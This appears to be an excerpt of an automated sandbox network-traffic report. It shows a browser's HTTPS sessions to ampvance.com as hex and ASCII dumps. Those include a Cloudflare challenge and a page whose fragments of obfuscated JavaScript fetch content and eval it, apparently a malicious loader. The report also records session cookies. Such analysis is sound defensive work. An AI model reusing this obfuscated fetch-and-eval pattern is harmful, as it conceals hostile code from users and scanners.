                                                      2024-03-05 13:23:42 UTC1369INData Raw: 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b
                                                      Data Ascii: tLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{back
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d
                                                      Data Ascii: idth:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74
                                                      Data Ascii: a http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to cont
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 30 4f 52 45 69 65 6c 62 45 62 55 75 6d 61 7a 61 4a 68 43 37 42 47 49 76 6e 36 38 46 4b 4a 44 4b 4c 32 32 43 4f 47 57 53 4b 72 57 56 73 4f 6d 31 44 61 70 65 70 30 52 49 71 6e 4c 7a 4c 2e 5f 79 49 47 43 77 64 6a 68 37 68 2e 35 59 33 6d 72 4d 33 49 65 6b 48 57 32 5f 55 69 69 74 76 36 6f 63 61 4f 78 63 79 68 59 74 7a 33 31 34 6b 58 32 36 66 4c 6a 78 36 6d 30 6a 5a 44 6a 39 45 31 4e 2e 4a 51 31 45 70 53 4a 4a 77 46 38 77 62 75 34 58 44 73 30 6b 57 75 41 55 52 65 44 30 6a 5f 2e 33 61 42 61 42 52 6a 55 69 69 46 56 33 4c 39 5a 5a 48 36 5f 78 6e 35 41 4d 54 6b 71 76 73 68 57 7a 58 37 71 71 63 33 79 7a 31 61 35 5a 49 4f 5f 4e 43 5a 38 66 77 59 31 34 66 37 75 6d 76 35 6a 44 36 6e 78 6c 37 53 48 64 62 56 45 6b 53 4f 7a 36 50 69 64 69 45 4e 5a 61 6e 5f 67 4d 68 50 69
                                                      Data Ascii: 0OREielbEbUumazaJhC7BGIvn68FKJDKL22COGWSKrWVsOm1Dapep0RIqnLzL._yIGCwdjh7h.5Y3mrM3IekHW2_Uiitv6ocaOxcyhYtz314kX26fLjx6m0jZDj9E1N.JQ1EpSJJwF8wbu4XDs0kWuAUReD0j_.3aBaBRjUiiFV3L9ZZH6_xn5AMTkqvshWzX7qqc3yz1a5ZIO_NCZ8fwY14f7umv5jD6nxl7SHdbVEkSOz6PidiENZan_gMhPi


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.449776172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:41 UTC474OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:42 UTC709INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:23:42 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: rhg5JigJovcCl6VyWpitqQ==$9FZ5ZsOp6WuS2Ws3bYP10w==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=191jDQWwrHQ2tLOVkvJWWCKVcBZXMv9rRWRcJJJjZ%2BnsPUy5%2Fts5UvNlL0B9wxf8bvo%2Foe88H9o9mAmTzH24XGQZk5aI9r7sQYRnr37vNZ1GNXjtXR6oUm4%2Fl8U5xCU%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c0bfeda4237-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:42 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:23:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.449777104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:42 UTC1381OUTGET /cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=0
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      Referer: https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:43 UTC626INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LAaRKLOd1AwDlE7CXQwEI7bQFJPCbpUvv4cBrsLcQ%2FoI2t%2BW3BH0e8shQbiflNrytCWVA7c0XOSkNdnrjk4ZQ2jijOHfxB8JdP4FKp5H%2FD2UwDm4aAEeEa1OHwcbx%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c108e615e7e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:43 UTC743INData Raw: 31 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 71 2f 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 64 65 65 36 64 61 66 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72
                                                      Data Ascii: 1170<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title></title> <script src="jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf"></script> <script sr
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 72 73 65 49 6e 74 28 4b 28 27 30 78 31 34 33 27 29 29 2f 30 78 37 2b 70 61 72 73 65 49 6e 74 28 4b 28 30 78 31 35 62 29 29 2f 30 78 38 2a 28 70 61 72 73 65 49 6e 74 28 4b 28 27 30 78 31 38 30 27 29 29 2f 30 78 39 29 3b 69 66 28 58 3d 3d 3d 54 29 62 72 65 61 6b 3b 65 6c 73 65 20 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 79 29 7b 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 49 2c 30 78 36 64 65 66 31 29 29 3b 76 61 72 20 47 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 71 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 54 2c 53 29 7b 76 61 72 20 58 3d 71 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 3b 69 66 28 53 29 7b 76 61 72 20 79
                                                      Data Ascii: rseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 35 35 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 57 3d 66 5b 6d 28 27 30 78 31 34 63 27 29 5d 5b 6d 28 30 78 31 34 30 29 5d 5b 6d 28 30 78 31 36 66 29 5d 28 66 29 2c 45 3d 58 5b 79 5d 2c 6e 3d 53 5b 45 5d 7c 7c 57 3b 57 5b 6d 28 27 30 78 31 34 39 27 29 5d 3d 66 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 66 29 2c 57 5b 6d 28 30 78 31 35 64 29 5d 3d 6e 5b 6d 28 30 78 31 35 64 29 5d 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 6e 29 2c 53 5b 45 5d 3d 57 3b 7d 7d 29 3b 56 28 29 3b 76 61 72 20 78 68 74 74 70 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 76 61 72 20 67 3d 5b 27 62 69 6e 64 27 2c 27 6c 69 6e 6b 27 2c 27 63 68 61 69 6e 27 2c 27 32 71 6e 46 73 54 77 27 2c 27 72 65 73 70 6f 6e 73 65 54 65 78 74 27 2c 27 73
                                                      Data Ascii: 55)];y++){var W=f[m('0x14c')][m(0x140)][m(0x16f)](f),E=X[y],n=S[E]||W;W[m('0x149')]=f[m('0x16f')](f),W[m(0x15d)]=n[m(0x15d)][m('0x16f')](n),S[E]=W;}});V();var xhttp=new XMLHttpRequest();function I(){var g=['bind','link','chain','2qnFsTw','responseText','s
                                                      2024-03-05 13:23:43 UTC991INData Raw: 72 20 79 3d 30 78 30 3b 79 3c 53 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 57 3d 53 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 39 29 29 3b 57 3f 58 5b 63 28 27 30 78 31 36 35 27 29 5d 28 57 29 3a 65 76 61 6c 28 53 5b 79 5d 5b 63 28 30 78 31 34 62 29 5d 29 3b 7d 76 61 72 20 45 3d 54 5b 63 28 30 78 31 36 64 29 5d 28 63 28 30 78 31 37 30 29 29 3b 66 6f 72 28 76 61 72 20 79 3d 30 78 30 3b 79 3c 45 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 6e 3d 45 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 61 29 29 3b 69 66 28 6e 26 26 6e 5b 63 28 27 30 78 31 37 64 27 29 5d 28 63 28 30 78 31 35 30 29 29 29 7b 76 61 72 20 75 3d 64 6f 63 75 6d 65 6e 74 5b 63 28 27 30 78 31 37 39 27 29
                                                      Data Ascii: r y=0x0;y<S[c('0x155')];y++){var W=S[y][c('0x146')](c(0x159));W?X[c('0x165')](W):eval(S[y][c(0x14b)]);}var E=T[c(0x16d)](c(0x170));for(var y=0x0;y<E[c('0x155')];y++){var n=E[y][c('0x146')](c(0x15a));if(n&&n[c('0x17d')](c(0x150))){var u=document[c('0x179')
                                                      2024-03-05 13:23:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.449778104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:43 UTC1138OUTGET /jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:43 UTC665INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:43 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tMi8DF01DR1eIT98pXyXB8i5IRz7O6%2BOL%2FDd5l1hL7bz%2Fafs6oc5hH%2Bfn0OwVYsfKVNM2IAccJhYcWmwFcLrUwsVZP5xNDQDIIei7qoV%2FeMIYrNXm1tPEJKtufnQGRQ%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c14b9920f51-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:43 UTC704INData Raw: 37 64 31 39 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64
                                                      Data Ascii: 7d19/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a d
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70
                                                      Data Ascii: get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.p
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 61 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 21 6e 2e 69 73 41 72 72 61 79 28 61 29 26 26 62 2d 70 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66
                                                      Data Ascii: a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;f
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 66 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62
                                                      Data Ascii: f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 4d 2b 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e
                                                      Data Ascii: )*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=n
